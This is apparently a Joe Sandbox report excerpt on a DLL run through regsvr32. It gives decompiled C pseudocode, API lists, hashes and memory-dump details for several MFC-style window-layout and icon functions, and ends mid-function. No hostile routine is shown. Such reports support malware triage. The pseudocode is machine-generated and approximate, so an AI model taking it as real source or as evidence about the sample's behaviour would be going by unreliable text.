                                                                                                                • Opcode Fuzzy Hash: 62a36cdf378d546a2627890dc174a3fe51776cdb57757038142c1d02188e673e
                                                                                                                • Instruction Fuzzy Hash: E6D05B315042316BE65067B55F4CDC63B54DB476A17490750FE39E21E4CF29CC4557D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 63%
                                                                                                                			E1003D5A7(intOrPtr __ecx, void* __edx) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t73;
                                                                                                                				signed char _t81;
                                                                                                                				signed int _t86;
                                                                                                                				signed int _t91;
                                                                                                                				signed int _t93;
                                                                                                                				signed int _t101;
                                                                                                                				signed int _t117;
                                                                                                                				intOrPtr _t131;
                                                                                                                				void* _t132;
                                                                                                                				intOrPtr _t139;
                                                                                                                				void* _t153;
                                                                                                                				signed int _t157;
                                                                                                                				void* _t158;
                                                                                                                				intOrPtr _t161;
                                                                                                                				void* _t162;
                                                                                                                				signed int _t164;
                                                                                                                				void* _t166;
                                                                                                                
                                                                                                                				_t153 = __edx;
                                                                                                                				_t133 = __ecx;
                                                                                                                				_t164 = _t166 - 0xb8;
                                                                                                                				_t73 =  *0x100b9e70; // 0xbb35530
                                                                                                                				 *(_t164 + 0xb4) = _t73 ^ _t164;
                                                                                                                				_t161 =  *((intOrPtr*)(_t164 + 0xc0));
                                                                                                                				_t131 = __ecx;
                                                                                                                				_t170 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t164 - 0x58)) = _t161;
                                                                                                                				 *(_t164 - 0x54) =  *(_t164 + 0xc4);
                                                                                                                				if(__ecx == 0) {
                                                                                                                					L1:
                                                                                                                					E1000A069(_t131, _t133, 0, _t161, _t170);
                                                                                                                				}
                                                                                                                				if(_t161 == 0) {
                                                                                                                					goto L1;
                                                                                                                				}
                                                                                                                				_t78 = GetWindowRect( *(_t161 + 0x20), _t164 - 0x80);
                                                                                                                				if( *((intOrPtr*)(_t161 + 0x8c)) != _t131 ||  *(_t164 - 0x54) != 0 && EqualRect(_t164 - 0x80,  *(_t164 - 0x54)) == 0) {
                                                                                                                					if( *((intOrPtr*)(_t131 + 0x94)) != 0 && ( *(_t161 + 0x84) & 0x00000040) != 0) {
                                                                                                                						 *(_t131 + 0x80) =  *(_t131 + 0x80) | 0x00000040;
                                                                                                                					}
                                                                                                                					 *(_t131 + 0x80) =  *(_t131 + 0x80) & 0xfffffff9;
                                                                                                                					_t81 =  *(_t161 + 0x80) & 0x00000006 |  *(_t131 + 0x80);
                                                                                                                					_t178 = _t81 & 0x00000040;
                                                                                                                					 *(_t131 + 0x80) = _t81;
                                                                                                                					if((_t81 & 0x00000040) == 0) {
                                                                                                                						_push(0x104);
                                                                                                                						_push(_t164 - 0x50);
                                                                                                                						E10018055(_t131, _t161, 0, _t161, _t178);
                                                                                                                						E100219F5(_t161, _t153,  *((intOrPtr*)(_t131 + 0x20)), _t164 - 0x50);
                                                                                                                					}
                                                                                                                					_t86 = ( *(_t161 + 0x80) ^  *(_t131 + 0x80)) & 0x0000f000 ^  *(_t161 + 0x80) | 0x00000f00;
                                                                                                                					if( *((intOrPtr*)(_t131 + 0x94)) == 0) {
                                                                                                                						_t87 = _t86 & 0xfffffffe;
                                                                                                                						__eflags = _t86 & 0xfffffffe;
                                                                                                                					} else {
                                                                                                                						_t87 = _t86 | 0x00000001;
                                                                                                                					}
                                                                                                                					E10042892(_t161, _t87);
                                                                                                                					 *((intOrPtr*)(_t164 - 0x6c)) = 0;
                                                                                                                					if( *((intOrPtr*)(_t161 + 0x8c)) != _t131 && IsWindowVisible( *(_t161 + 0x20)) != 0) {
                                                                                                                						E10017C59(_t161, 0, 0, 0, 0, 0, 0x97);
                                                                                                                						 *((intOrPtr*)(_t164 - 0x6c)) = 1;
                                                                                                                					}
                                                                                                                					 *(_t164 - 0x70) =  *(_t164 - 0x70) | 0xffffffff;
                                                                                                                					if( *(_t164 - 0x54) == 0) {
                                                                                                                						_t60 = _t131 + 0x98; // 0x98
                                                                                                                						_t156 = _t60;
                                                                                                                						E100420F2(_t131, _t60, _t164,  *((intOrPtr*)(_t60 + 8)), _t161);
                                                                                                                						E100420F2(_t131, _t156, _t164,  *((intOrPtr*)(_t156 + 8)), 0);
                                                                                                                						_t91 =  *0x100bdc8c; // 0x2
                                                                                                                						_t157 = 0;
                                                                                                                						__eflags = 0;
                                                                                                                						_t93 =  *0x100bdc88; // 0x2
                                                                                                                						_t138 = _t161;
                                                                                                                						E10017C59(_t161, 0,  ~_t93,  ~_t91, 0, 0, 0x115);
                                                                                                                					} else {
                                                                                                                						CopyRect(_t164 - 0x68,  *(_t164 - 0x54));
                                                                                                                						E1000C8F5(_t131, _t164 - 0x68);
                                                                                                                						asm("cdq");
                                                                                                                						asm("cdq");
                                                                                                                						_push(( *((intOrPtr*)(_t164 - 0x5c)) -  *((intOrPtr*)(_t164 - 0x64)) - _t153 >> 1) +  *((intOrPtr*)(_t164 - 0x64)));
                                                                                                                						_push(( *((intOrPtr*)(_t164 - 0x60)) -  *(_t164 - 0x68) - _t153 >> 1) +  *(_t164 - 0x68));
                                                                                                                						_push( *((intOrPtr*)(_t164 - 0x58)));
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						_t117 = E1003CABE(_t131);
                                                                                                                						_t138 =  *((intOrPtr*)(_t164 - 0x58));
                                                                                                                						 *(_t164 - 0x70) = _t117;
                                                                                                                						E10017C59( *((intOrPtr*)(_t164 - 0x58)), 0,  *(_t164 - 0x68),  *((intOrPtr*)(_t164 - 0x64)),  *((intOrPtr*)(_t164 - 0x60)) -  *(_t164 - 0x68),  *((intOrPtr*)(_t164 - 0x5c)) -  *((intOrPtr*)(_t164 - 0x64)), 0x114);
                                                                                                                						_t161 =  *((intOrPtr*)(_t164 - 0x58));
                                                                                                                						_t157 = 0;
                                                                                                                					}
                                                                                                                					if(E10013FEA(_t131, _t138, _t164, GetParent( *(_t161 + 0x20))) != _t131) {
                                                                                                                						E1003C8A7(_t161, _t131);
                                                                                                                					}
                                                                                                                					_t139 =  *((intOrPtr*)(_t161 + 0x8c));
                                                                                                                					if(_t139 != _t131) {
                                                                                                                						__eflags = _t139 - _t157;
                                                                                                                						if(_t139 != _t157) {
                                                                                                                							__eflags =  *((intOrPtr*)(_t131 + 0x94)) - _t157;
                                                                                                                							if( *((intOrPtr*)(_t131 + 0x94)) == _t157) {
                                                                                                                								L28:
                                                                                                                								_t101 = 0;
                                                                                                                								__eflags = 0;
                                                                                                                							} else {
                                                                                                                								__eflags =  *((intOrPtr*)(_t139 + 0x94)) - _t157;
                                                                                                                								if( *((intOrPtr*)(_t139 + 0x94)) != _t157) {
                                                                                                                									goto L28;
                                                                                                                								} else {
                                                                                                                									_t101 = 1;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							_push(_t101);
                                                                                                                							_push(0xffffffff);
                                                                                                                							goto L30;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_push(_t157);
                                                                                                                						_push( *(_t164 - 0x70));
                                                                                                                						L30:
                                                                                                                						_push(_t161);
                                                                                                                						L1003CE7C(_t139, _t157);
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)(_t161 + 0x8c)) = _t131;
                                                                                                                					if( *((intOrPtr*)(_t164 - 0x6c)) != _t157) {
                                                                                                                						E10017C59(_t161, _t157, _t157, _t157, _t157, _t157, 0x57);
                                                                                                                					}
                                                                                                                					L1003CE15(_t131, _t131, _t164, _t161);
                                                                                                                					 *(L10034F71(_t131) + 0xd0) =  *(_t78 + 0xd0) | 0x0000000c;
                                                                                                                				}
                                                                                                                				_pop(_t158);
                                                                                                                				_pop(_t162);
                                                                                                                				_pop(_t132);
                                                                                                                				return E1004763E(_t78, _t132,  *(_t164 + 0xb4) ^ _t164, _t153, _t158, _t162);
                                                                                                                			}

























                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32 ref: 1003D5EF
                                                                                                                • EqualRect.USER32 ref: 1003D60D
                                                                                                                • IsWindowVisible.USER32(?), ref: 1003D6B3
                                                                                                                • CopyRect.USER32(?,?), ref: 1003D6E5
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                  • Part of subcall function 1003CABE: GetWindowRect.USER32 ref: 1003CB22
                                                                                                                  • Part of subcall function 10017C59: SetWindowPos.USER32(?,?,00000006,?,?,00000000,00000000), ref: 10017C7F
                                                                                                                • GetParent.USER32(?), ref: 1003D79A
                                                                                                                  • Part of subcall function 1003C8A7: SetParent.USER32(?,00000000), ref: 1003C8B6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: RectWindow$Parent$CopyEqualException@8H_prolog3ThrowVisible
                                                                                                                • String ID:
                                                                                                                • API String ID: 388495236-0
                                                                                                                • Opcode ID: de8c66a33fcc98470403020ca3bef0c2d831b215de4245826c4501e487d03b43
                                                                                                                • Instruction ID: 1033408fafe0d97a6b005ea6a196d6221c2d026f0d07b7c0cba03cff09cd3f54
                                                                                                                • Opcode Fuzzy Hash: de8c66a33fcc98470403020ca3bef0c2d831b215de4245826c4501e487d03b43
                                                                                                                • Instruction Fuzzy Hash: B8718A31A00609DFDB12DFA8CC85BAEBBBAFF45341F10452AE55AEF195DB31A905CB10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 41%
                                                                                                                			E1003D82F(intOrPtr __ecx, void* __edx) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t61;
                                                                                                                				signed char _t68;
                                                                                                                				signed int _t73;
                                                                                                                				intOrPtr _t112;
                                                                                                                				void* _t113;
                                                                                                                				signed int _t118;
                                                                                                                				signed int _t120;
                                                                                                                				void* _t137;
                                                                                                                				RECT* _t139;
                                                                                                                				void* _t141;
                                                                                                                				intOrPtr _t143;
                                                                                                                				void* _t144;
                                                                                                                				signed int _t146;
                                                                                                                				void* _t148;
                                                                                                                				void* _t149;
                                                                                                                
                                                                                                                				_t137 = __edx;
                                                                                                                				_t114 = __ecx;
                                                                                                                				_t146 = _t148 - 0xb0;
                                                                                                                				_t149 = _t148 - 0x130;
                                                                                                                				_t61 =  *0x100b9e70; // 0xbb35530
                                                                                                                				 *(_t146 + 0xac) = _t61 ^ _t146;
                                                                                                                				_t143 =  *((intOrPtr*)(_t146 + 0xb8));
                                                                                                                				_t139 =  *(_t146 + 0xbc);
                                                                                                                				_t112 = __ecx;
                                                                                                                				_t152 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t146 - 0x6c)) = _t143;
                                                                                                                				 *(_t146 - 0x70) = _t139;
                                                                                                                				if(__ecx == 0) {
                                                                                                                					L1:
                                                                                                                					E1000A069(_t112, _t114, _t139, _t143, _t152);
                                                                                                                				}
                                                                                                                				if(_t143 == 0) {
                                                                                                                					goto L1;
                                                                                                                				}
                                                                                                                				_t65 = GetWindowRect( *(_t143 + 0x20), _t146 - 0x80);
                                                                                                                				if( *((intOrPtr*)(_t143 + 0x8c)) != _t112 || _t139 != 0 && EqualRect(_t146 - 0x80, _t139) == 0) {
                                                                                                                					if( *((intOrPtr*)(_t112 + 0x94)) != 0 && ( *(_t143 + 0x84) & 0x00000040) != 0) {
                                                                                                                						 *(_t112 + 0x80) =  *(_t112 + 0x80) | 0x00000040;
                                                                                                                					}
                                                                                                                					 *(_t112 + 0x80) =  *(_t112 + 0x80) & 0xfffffff9;
                                                                                                                					_t68 =  *(_t143 + 0x80) & 0x00000006 |  *(_t112 + 0x80);
                                                                                                                					_t160 = _t68 & 0x00000040;
                                                                                                                					 *(_t112 + 0x80) = _t68;
                                                                                                                					if((_t68 & 0x00000040) == 0) {
                                                                                                                						_push(0x104);
                                                                                                                						_push(_t146 - 0x58);
                                                                                                                						E10018055(_t112, _t143, _t139, _t143, _t160);
                                                                                                                						E100219F5(_t143, _t137,  *((intOrPtr*)(_t112 + 0x20)), _t146 - 0x58);
                                                                                                                					}
                                                                                                                					_t73 = ( *(_t143 + 0x80) ^  *(_t112 + 0x80)) & 0x0000f000 ^  *(_t143 + 0x80) | 0x00000f00;
                                                                                                                					if( *((intOrPtr*)(_t112 + 0x94)) == 0) {
                                                                                                                						_t74 = _t73 & 0xfffffffe;
                                                                                                                						__eflags = _t73 & 0xfffffffe;
                                                                                                                					} else {
                                                                                                                						_t74 = _t73 | 0x00000001;
                                                                                                                					}
                                                                                                                					E10042892(_t143, _t74);
                                                                                                                					_push(0xffffffff);
                                                                                                                					_t140 = E1003CA62(_t112, GetDlgCtrlID( *(_t143 + 0x20)) & 0x0000ffff);
                                                                                                                					if(_t140 > 0) {
                                                                                                                						 *((intOrPtr*)(E1003C86D(_t112, _t112 + 0x98, _t140, _t143, _t140))) = _t143;
                                                                                                                					}
                                                                                                                					if( *(_t146 - 0x70) == 0) {
                                                                                                                						__eflags = _t140 - 1;
                                                                                                                						if(_t140 < 1) {
                                                                                                                							_t140 = _t112 + 0x98;
                                                                                                                							E100420F2(_t112, _t112 + 0x98, _t146,  *((intOrPtr*)(_t112 + 0xa0)), _t143);
                                                                                                                							E100420F2(_t112, _t140, _t146,  *((intOrPtr*)(_t140 + 8)), 0);
                                                                                                                						}
                                                                                                                						_t118 =  *0x100bdc8c; // 0x2
                                                                                                                						_push(0x115);
                                                                                                                						__eflags = 0;
                                                                                                                						_push(0);
                                                                                                                						_push(0);
                                                                                                                						_push( ~_t118);
                                                                                                                						_t120 =  *0x100bdc88; // 0x2
                                                                                                                						_push( ~_t120);
                                                                                                                						_push(0);
                                                                                                                					} else {
                                                                                                                						CopyRect(_t146 - 0x68,  *(_t146 - 0x70));
                                                                                                                						E1000C8F5(_t112, _t146 - 0x68);
                                                                                                                						if(_t140 < 1) {
                                                                                                                							asm("cdq");
                                                                                                                							asm("cdq");
                                                                                                                							_push(( *((intOrPtr*)(_t146 - 0x5c)) -  *((intOrPtr*)(_t146 - 0x64)) - _t137 >> 1) +  *((intOrPtr*)(_t146 - 0x64)));
                                                                                                                							_push(( *((intOrPtr*)(_t146 - 0x60)) -  *(_t146 - 0x68) - _t137 >> 1) +  *(_t146 - 0x68));
                                                                                                                							_t140 = _t149 - 0x10;
                                                                                                                							_push( *((intOrPtr*)(_t146 - 0x6c)));
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							E1003CABE(_t112);
                                                                                                                							_t143 =  *((intOrPtr*)(_t146 - 0x6c));
                                                                                                                						}
                                                                                                                						_push(0x114);
                                                                                                                						_push( *((intOrPtr*)(_t146 - 0x5c)) -  *((intOrPtr*)(_t146 - 0x64)));
                                                                                                                						_push( *((intOrPtr*)(_t146 - 0x60)) -  *(_t146 - 0x68));
                                                                                                                						_push( *((intOrPtr*)(_t146 - 0x64)));
                                                                                                                						_push( *(_t146 - 0x68));
                                                                                                                						_push(0);
                                                                                                                					}
                                                                                                                					E10017C59(_t143);
                                                                                                                					if(E10013FEA(_t112, _t143, _t146, GetParent( *(_t143 + 0x20))) != _t112) {
                                                                                                                						E1003C8A7(_t143, _t112);
                                                                                                                					}
                                                                                                                					_t123 =  *((intOrPtr*)(_t143 + 0x8c));
                                                                                                                					if( *((intOrPtr*)(_t143 + 0x8c)) != 0) {
                                                                                                                						L1003CE7C(_t123, _t140, _t143, 0xffffffff, 0);
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)(_t143 + 0x8c)) = _t112;
                                                                                                                					 *(L10034F71(_t112) + 0xd0) =  *(_t65 + 0xd0) | 0x0000000c;
                                                                                                                				}
                                                                                                                				_pop(_t141);
                                                                                                                				_pop(_t144);
                                                                                                                				_pop(_t113);
                                                                                                                				return E1004763E(_t65, _t113,  *(_t146 + 0xac) ^ _t146, _t137, _t141, _t144);
                                                                                                                			}























                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32 ref: 1003D875
                                                                                                                • EqualRect.USER32 ref: 1003D890
                                                                                                                • GetDlgCtrlID.USER32 ref: 1003D92F
                                                                                                                • CopyRect.USER32(?,?), ref: 1003D961
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                  • Part of subcall function 1003CABE: GetWindowRect.USER32 ref: 1003CB22
                                                                                                                  • Part of subcall function 10017C59: SetWindowPos.USER32(?,?,00000006,?,?,00000000,00000000), ref: 10017C7F
                                                                                                                • GetParent.USER32(?), ref: 1003DA15
                                                                                                                  • Part of subcall function 1003C8A7: SetParent.USER32(?,00000000), ref: 1003C8B6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Window$Parent$CopyCtrlEqualException@8H_prolog3Throw
                                                                                                                • String ID:
                                                                                                                • API String ID: 964284190-0
                                                                                                                • Opcode ID: 3d664d8faf7a80dec14bbfa1b94fde56678420513a06af672007b5103854ab3e
                                                                                                                • Instruction ID: 50860e7fa6c8c0719ec3f0ef5932a3e24dacefad94686779ca8f32f31c2a9bc9
                                                                                                                • Opcode Fuzzy Hash: 3d664d8faf7a80dec14bbfa1b94fde56678420513a06af672007b5103854ab3e
                                                                                                                • Instruction Fuzzy Hash: D1618B75A006099FEB12DFA8CD85BEE77BAFB45301F00452AE95ADF291DF30A804CB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E10045069(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				struct HICON__* _t78;
                                                                                                                				void* _t80;
                                                                                                                				struct HICON__* _t87;
                                                                                                                				void* _t91;
                                                                                                                				void* _t94;
                                                                                                                				void* _t96;
                                                                                                                				void* _t99;
                                                                                                                				void* _t101;
                                                                                                                				struct HICON__* _t108;
                                                                                                                				void* _t127;
                                                                                                                				void* _t147;
                                                                                                                				int _t148;
                                                                                                                				void* _t152;
                                                                                                                
                                                                                                                				_t145 = __edx;
                                                                                                                				E1004764D(0x10091875, __ebx, __edi, __esi);
                                                                                                                				__imp__StringFromCLSID( *(_t152 + 0xc), _t152 - 0x14, 8);
                                                                                                                				_t147 = E10020CCA( *((intOrPtr*)(_t152 - 0x14)));
                                                                                                                				if(_t147 != 0) {
                                                                                                                					_t151 =  *((intOrPtr*)(_t152 + 8));
                                                                                                                					E10044CCF(0,  *((intOrPtr*)(_t152 + 8)), __edx, _t152, __eflags, 0, _t147);
                                                                                                                					E10044CCF(0,  *((intOrPtr*)(_t152 + 8)), __edx, _t152, __eflags, 1,  *((intOrPtr*)(_t152 + 0x10)));
                                                                                                                					__imp__CoTaskMemFree(_t147);
                                                                                                                					L1000140B(_t152 - 0x10, E100184C0());
                                                                                                                					 *((intOrPtr*)(_t152 - 4)) = 0;
                                                                                                                					E10029AB3(0, __edx,  *((intOrPtr*)(E1001E302(0, _t147, _t151, __eflags) + 8)), _t152 - 0x10);
                                                                                                                					E10044CCF(0, _t151, _t145, _t152, __eflags, 2,  *(_t152 - 0x10));
                                                                                                                					E10044CCF(0, _t151, _t145, _t152, __eflags, 3,  *((intOrPtr*)(_t152 + 0x14)));
                                                                                                                					E10044CCF(0, _t151, _t145, _t152, __eflags, 4,  *((intOrPtr*)(_t152 + 0x18)));
                                                                                                                					E10044CCF(0, _t151, _t145, _t152, __eflags, 5,  *((intOrPtr*)(E1001E302(0, _t147, _t151, __eflags) + 0x10)));
                                                                                                                					L1000140B(_t152 + 8, E100184C0());
                                                                                                                					_t148 =  *(_t152 + 0x1c);
                                                                                                                					__eflags = _t148;
                                                                                                                					 *((char*)(_t152 - 4)) = 1;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						 *(_t152 + 0xc) =  *(_t152 - 0x10);
                                                                                                                						_t108 = ExtractIconA( *(E1001E302(0, _t148, _t151, __eflags) + 8),  *(_t152 + 0xc), _t148);
                                                                                                                						__eflags = _t108;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_t148 = 0;
                                                                                                                							__eflags = 0;
                                                                                                                						} else {
                                                                                                                							DestroyIcon(_t108);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					L1000106E(_t152 + 8, 0x1009d478, _t148);
                                                                                                                					_t149 =  *((intOrPtr*)(_t152 + 8));
                                                                                                                					E10044CCF(0, _t151, _t145, _t152, __eflags, 6,  *((intOrPtr*)(_t152 + 8)));
                                                                                                                					E10044CCF(0, _t151, _t145, _t152, __eflags, 7,  *((intOrPtr*)(_t152 + 0x20)));
                                                                                                                					L1000140B(_t152 + 0xc, E100184C0());
                                                                                                                					_t78 =  *(_t152 + 0x24);
                                                                                                                					__eflags = _t78;
                                                                                                                					 *((char*)(_t152 - 4)) = 2;
                                                                                                                					if(_t78 == 0) {
                                                                                                                						L9:
                                                                                                                						L100011E5(_t152 + 0xc,  *((intOrPtr*)(_t152 + 0x20)));
                                                                                                                						_t80 = E10027BB5(_t152 + 0xc, 0x28, 0);
                                                                                                                						__eflags = _t80 - 0xffffffff;
                                                                                                                						_t127 = _t152 + 0xc;
                                                                                                                						if(_t80 == 0xffffffff) {
                                                                                                                							L12:
                                                                                                                							L100011D1(_t127);
                                                                                                                							goto L14;
                                                                                                                						}
                                                                                                                						_t91 = E10027ECF(_t127, _t152 + 0x20, _t80 + 1);
                                                                                                                						 *((char*)(_t152 - 4)) = 3;
                                                                                                                						E10018A1F(0, _t152 + 0xc, _t152, _t91);
                                                                                                                						 *((char*)(_t152 - 4)) = 2;
                                                                                                                						L100013E3( *((intOrPtr*)(_t152 + 0x20)) + 0xfffffff0, _t145);
                                                                                                                						_t94 = E10027BB5(_t152 + 0xc, 0x2e, 0);
                                                                                                                						__eflags = _t94 - 0xffffffff;
                                                                                                                						_t127 = _t152 + 0xc;
                                                                                                                						if(_t94 == 0xffffffff) {
                                                                                                                							goto L12;
                                                                                                                						}
                                                                                                                						_t96 = E10027ECF(_t127, _t152 + 0x20, _t94);
                                                                                                                						 *((char*)(_t152 - 4)) = 4;
                                                                                                                						E10018A1F(0, _t152 + 0xc, _t152, _t96);
                                                                                                                						 *((char*)(_t152 - 4)) = 2;
                                                                                                                						L100013E3( *((intOrPtr*)(_t152 + 0x20)) + 0xfffffff0, _t145);
                                                                                                                						_t99 = E10027BB5(_t152 + 0xc, 0x29, 0);
                                                                                                                						__eflags = _t99 - 0xffffffff;
                                                                                                                						_t127 = _t152 + 0xc;
                                                                                                                						if(_t99 != 0xffffffff) {
                                                                                                                							_t101 = E10027DD9(_t127, _t152 + 0x20, _t99);
                                                                                                                							 *((char*)(_t152 - 4)) = 5;
                                                                                                                							E10018A1F(0, _t152 + 0xc, _t152, _t101);
                                                                                                                							__eflags =  *((intOrPtr*)(_t152 + 0x20)) + 0xfffffff0;
                                                                                                                							L100013E3( *((intOrPtr*)(_t152 + 0x20)) + 0xfffffff0, _t145);
                                                                                                                							goto L14;
                                                                                                                						}
                                                                                                                						goto L12;
                                                                                                                					} else {
                                                                                                                						__eflags = _t78->i;
                                                                                                                						if(_t78->i == 0) {
                                                                                                                							goto L9;
                                                                                                                						}
                                                                                                                						L100011E5(_t152 + 0xc, _t78);
                                                                                                                						L14:
                                                                                                                						_t112 =  *(_t152 + 0xc);
                                                                                                                						E10044CCF( *(_t152 + 0xc), _t151, _t145, _t152, __eflags, 8,  *(_t152 + 0xc));
                                                                                                                						L100013E3(_t112 - 0x10, _t145);
                                                                                                                						L100013E3(_t149 - 0x10, _t145);
                                                                                                                						L100013E3( &(( *(_t152 - 0x10))[0xfffffffffffffff0]), _t145);
                                                                                                                						_t87 = 1;
                                                                                                                						__eflags = 1;
                                                                                                                						L15:
                                                                                                                						return E10047725(_t87);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t87 = 0;
                                                                                                                				goto L15;
                                                                                                                			}

















                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10045070
                                                                                                                • StringFromCLSID.OLE32(?,?), ref: 1004507C
                                                                                                                  • Part of subcall function 10020CCA: CoTaskMemFree.OLE32(00000000), ref: 10020CDB
                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 100450B2
                                                                                                                • ExtractIconA.SHELL32(?,?,?), ref: 1004513C
                                                                                                                • DestroyIcon.USER32(00000000), ref: 10045147
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeIconTask$DestroyExtractFromH_prolog3String
                                                                                                                • String ID:
                                                                                                                • API String ID: 2818569797-0
                                                                                                                • Opcode ID: 591b60d6889b0c773876b142260c05f206530f88d93d4be920f53e24253c0822
                                                                                                                • Instruction ID: ab5e8c94ddb41993ccef22247f94a03736f241471aafc1ae80ca1b2f4dc0b3c1
                                                                                                                • Opcode Fuzzy Hash: 591b60d6889b0c773876b142260c05f206530f88d93d4be920f53e24253c0822
                                                                                                                • Instruction Fuzzy Hash: 4D519F79100148ABDB05DFB0CC96EEE3769EF45354F208219F92AAB2D2DF34AA04C765
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E1003850F(void* __ebx, intOrPtr __ecx, struct _OSVERSIONINFOA __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t70;
                                                                                                                				signed int _t72;
                                                                                                                				void* _t82;
                                                                                                                				char* _t89;
                                                                                                                				intOrPtr _t92;
                                                                                                                				void* _t101;
                                                                                                                				char* _t102;
                                                                                                                				signed char _t103;
                                                                                                                				void* _t110;
                                                                                                                				intOrPtr _t118;
                                                                                                                				void* _t119;
                                                                                                                				void* _t120;
                                                                                                                				signed int _t129;
                                                                                                                
                                                                                                                				_t115 = __edi;
                                                                                                                				_push(0xa4);
                                                                                                                				E100476B6(0x10090cfc, __ebx, __edi, __esi);
                                                                                                                				 *((intOrPtr*)(_t119 - 0xac)) =  *((intOrPtr*)(_t119 + 0x10));
                                                                                                                				 *((intOrPtr*)(_t119 - 0xa8)) =  *((intOrPtr*)(_t119 + 0x18));
                                                                                                                				_t118 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t119 - 0xb0)) = __ecx;
                                                                                                                				E1001B6E7(__ecx, 0,  *((intOrPtr*)(_t119 + 0x1c)));
                                                                                                                				 *((intOrPtr*)(_t119 - 4)) = 0;
                                                                                                                				 *((intOrPtr*)(__ecx)) = 0x1009eb6c;
                                                                                                                				L100010DC(__ecx + 0x7c);
                                                                                                                				 *((char*)(_t119 - 4)) = 1;
